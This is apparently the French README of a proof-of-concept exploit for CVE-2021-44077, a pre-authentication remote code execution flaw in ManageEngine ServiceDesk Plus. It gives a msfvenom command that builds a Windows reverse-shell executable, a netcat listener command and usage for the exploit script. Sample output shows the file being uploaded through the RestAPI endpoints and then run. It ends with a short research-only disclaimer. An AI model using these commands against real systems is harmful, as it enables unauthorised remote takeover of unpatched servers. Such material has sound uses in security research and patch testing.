
Exploit de preuve de concept pour une RCE PreAuth dans ManageEngine ServiceDesk Plus (CVE-2021-44077). Téléverse et exécute des exécutables Windows arbitraires sur des cibles vulnérables.
Preuve de concept d'exploitation pour CVE-2021-44077 : RCE PreAuth dans ManageEngine ServiceDesk Plus < 11306
Basé sur :
Avis CISA :
Correctif (mettre à jour vers le build 11306 ou une version ultérieure) :
Testé sur ManageEngine ServiceDesk Plus Build 11303. Tous les antivirus désactivés.
L'exploit téléverse un exécutable Windows sur la cible et l'exécute.
Pour exploiter la vulnérabilité, générez d'abord un exécutable. Par exemple :
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.140 LPORT=4444 -f exe > msiexec.exe
Installez le fichier requirements avec pip install ou assurez-vous de disposer du package requests.
Si vous essayez de récupérer un reverse shell, lancez d'abord votre listener, par exemple :
nc -l 4444
Exécutez ensuite le script d'exploitation en passant les arguments url et exe, par exemple :
python exploit.py http://<TARGET>:<PORT> <path_to_exe>
Exemple de sortie du script :
% python exploit.py http://192.168.0.140:8080 msiexec.exe
[+] Target: http://192.168.0.140:8080/
[+] Executable: msiexec.exe
[+] Uploading msiexec.exe to http://192.168.0.140:8080/RestAPI/ImportTechnicians?step=1
[+] Got 401 error code on upload. This is expected.
[+] Uploaded msiexec.exe
[+] Attempting to invoke against url http://192.168.0.140:8080/./RestAPI/s247action. Waiting up to 20 seconds...
[+] Done, did it work?

bin d'installation, y compris des fichiers existants tels que des scripts batch. Il peut exister d'autres moyens d'invoquer le fichier téléversé.Ce logiciel a été créé uniquement à des fins de recherche académique et pour le développement de techniques défensives efficaces, et n'est pas destiné à être utilisé pour attaquer des systèmes, sauf autorisation explicite. Les mainteneurs du projet ne sont pas responsables de l'utilisation abusive du logiciel. Utilisez-le de manière responsable.